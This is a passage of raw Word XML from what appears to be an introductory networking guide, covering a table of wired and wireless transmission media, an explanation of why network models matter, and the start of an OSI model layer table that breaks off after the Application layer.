              <w:t>Up to 40 km without repeaters</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="63637C21" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>Ideal for long</w:t>
            </w:r>
            <w:r w:rsidRPr="006750A5">
              <w:noBreakHyphen/>
              <w:t>distance connections</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006750A5" w:rsidRPr="006750A5" w14:paraId="34F7BBB2" w14:textId="77777777" w:rsidTr="006750A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14A44F3C" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E806252" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E48E677" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>Immune to electromagnetic interference</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DBE34AD" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>Excellent for high</w:t>
            </w:r>
            <w:r w:rsidRPr="006750A5">
              <w:noBreakHyphen/>
              <w:t>interference environments</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006750A5" w:rsidRPr="006750A5" w14:paraId="3B8D3C71" w14:textId="77777777" w:rsidTr="006750A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1EE87668" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>Wireless Media</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="571325FB" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>Wi</w:t>
            </w:r>
            <w:r w:rsidRPr="006750A5">
              <w:noBreakHyphen/>
              <w:t>Fi</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14A502DA" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>2.4 GHz &amp; 5 GHz radio frequencies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="196B118E" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>Widely used for local wireless networks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006750A5" w:rsidRPr="006750A5" w14:paraId="5FFCE25E" w14:textId="77777777" w:rsidTr="006750A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34549C4F" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CFD53B3" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>Bluetooth</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D80BB12" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>Short</w:t>
            </w:r>
            <w:r w:rsidRPr="006750A5">
              <w:noBreakHyphen/>
              <w:t>range, low</w:t>
            </w:r>
            <w:r w:rsidRPr="006750A5">
              <w:noBreakHyphen/>
              <w:t>power</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1E954821" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>Great for peripherals and device</w:t>
            </w:r>
            <w:r w:rsidRPr="006750A5">
              <w:noBreakHyphen/>
              <w:t>to</w:t>
            </w:r>
            <w:r w:rsidRPr="006750A5">
              <w:noBreakHyphen/>
              <w:t>device links</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006750A5" w:rsidRPr="006750A5" w14:paraId="269E7B12" w14:textId="77777777" w:rsidTr="006750A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="03851BD3" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="248921CE" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>Cellular</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BE29F7F" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>4G LTE, 5G networks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="000DA5CE" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>Mobile broadband over wide areas</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006750A5" w:rsidRPr="006750A5" w14:paraId="533A8B43" w14:textId="77777777" w:rsidTr="006750A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="28E433F7" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="55AA4459" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>Satellite</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="000CFE53" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>Global coverage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D857086" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r w:rsidRPr="006750A5">
              <w:t>High latency compared to terrestrial networks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6823257F" w14:textId="77777777" w:rsidR="006750A5" w:rsidRPr="006750A5" w:rsidRDefault="006750A5" w:rsidP="006750A5"/>
    <w:p w14:paraId="150EC14D" w14:textId="77777777" w:rsidR="006750A5" w:rsidRDefault="006750A5">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial Black" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Arial Black" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B52960F" w14:textId="1C9B8374" w:rsidR="00444340" w:rsidRDefault="00444340" w:rsidP="00C75443">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Network Models</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5532D08E" w14:textId="5E751E44" w:rsidR="00444340" w:rsidRDefault="00444340" w:rsidP="00444340">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>What Are</w:t>
      </w:r>
      <w:r w:rsidRPr="00444340">
        <w:t xml:space="preserve"> Network Models?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3A1EBD" w14:textId="1AF57268" w:rsidR="00444340" w:rsidRDefault="00444340" w:rsidP="00444340">
      <w:r w:rsidRPr="00444340">
        <w:t xml:space="preserve">Network models are </w:t>
      </w:r>
      <w:r w:rsidRPr="00444340">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>conceptual frameworks</w:t>
      </w:r>
      <w:r w:rsidRPr="00444340">
        <w:t xml:space="preserve"> that help us understand how network communication works. Think of them as blueprints that show how data travels from one device to another through various stages of processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B7695B" w14:textId="206ACB48" w:rsidR="00444340" w:rsidRDefault="00444340" w:rsidP="00444340">
      <w:r>
        <w:t>Network models are important because:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385177F0" w14:textId="77777777" w:rsidR="00444340" w:rsidRDefault="00444340" w:rsidP="00444340">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00444340">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Standardization</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: It gives engineers a </w:t>
      </w:r>
      <w:r w:rsidRPr="00740027">
        <w:t>universal language</w:t>
      </w:r>
      <w:r>
        <w:t>. For example, when someone says "this is a Layer 3 issue", everyone knows they’re talking about IP routing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28730EA7" w14:textId="77777777" w:rsidR="00444340" w:rsidRDefault="00444340" w:rsidP="00444340">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00740027">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Troubleshooting</w:t>
      </w:r>
      <w:r>
        <w:t>: It helps you isolate problems. For example, if you can ping an IP but cannot load a website, you know Layers 1–3 are fine, and the issue is likely at Layer 4 or above.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6105D5B0" w14:textId="77777777" w:rsidR="00444340" w:rsidRDefault="00444340" w:rsidP="00444340">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Education</w:t>
      </w:r>
      <w:r>
        <w:t>: It organizes complex networking concepts into manageable chunks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E3A38B" w14:textId="77777777" w:rsidR="00444340" w:rsidRDefault="00444340" w:rsidP="00444340">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00444340">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Design</w:t>
      </w:r>
      <w:r w:rsidRPr="00444340">
        <w:t>: Guides network architecture and protocol development</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="636F8B93" w14:textId="2F275BD5" w:rsidR="00444340" w:rsidRDefault="00444340" w:rsidP="00444340">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Common </w:t>
      </w:r>
      <w:r w:rsidRPr="00444340">
        <w:t>Network Models</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1EA914" w14:textId="3D8E4E34" w:rsidR="00444340" w:rsidRDefault="00444340" w:rsidP="00444340">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r w:rsidRPr="00740027">
        <w:t>OSI Model</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458DD8D7" w14:textId="129E06B6" w:rsidR="00444340" w:rsidRPr="00444340" w:rsidRDefault="00444340" w:rsidP="00444340">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:t>Layers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344387C5" w14:textId="4B971A84" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00444340" w:rsidP="00B21970">
      <w:r>
        <w:t xml:space="preserve">OSI (Open Systems Interconnection) model </w:t>
      </w:r>
      <w:r w:rsidRPr="00740027">
        <w:t xml:space="preserve">divides network communications functions into </w:t>
      </w:r>
      <w:r w:rsidRPr="00444340">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7 layers</w:t>
      </w:r>
      <w:r w:rsidRPr="00740027">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="756"/>
        <w:gridCol w:w="1466"/>
        <w:gridCol w:w="4351"/>
        <w:gridCol w:w="3743"/>
        <w:gridCol w:w="3532"/>
        <w:gridCol w:w="3648"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B21970" w:rsidRPr="00B21970" w14:paraId="663F99C6" w14:textId="77777777" w:rsidTr="00B21970">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DBC532E" w14:textId="00294E82" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Layer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5CCFD18B" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2BA6A66D" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="334B70C6" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Key Functions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="70323936" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Common Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="51C9D24A" w14:textId="3818CA53" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Examples</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B21970" w:rsidRPr="00B21970" w14:paraId="53070EB7" w14:textId="77777777" w:rsidTr="00B21970">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="30FB2A81" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2E9A6E15" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="757DDF96" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>Provides network services directly to user applications</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78F77407" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>• Interface between applications and network</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• High-level protocols and data formatting</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• User authentication and privacy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="482B182B" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>• HTTP/HTTPS (Web browsing)</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• SMTP (Email sending)</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• POP3/IMAP (Email receiving)</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• FTP/SFTP (File transfers)</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• DNS (Name resolution)</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• DHCP (IP assignment)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="384B0B8E" w14:textId="77777777" w:rsidR="00B21970" w:rsidRPr="00B21970" w:rsidRDefault="00B21970" w:rsidP="00B21970">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
              <w:spacing w:before="40" w:after="40"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r w:rsidRPr="00B21970">
              <w:t>• Web Browsers (Chrome, Firefox)</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• Email Clients (Outlook, Gmail)</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• File Transfer apps</w:t>
            </w:r>
            <w:r w:rsidRPr="00B21970">
              <w:br/>
              <w:t>• SSH clients, VNC viewers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B21970" w:rsidRPr="00B21970" w14:paraId="1CB6951B" w14:textId="77777777" w:rsidTr="00B21970">
        <w:tc>
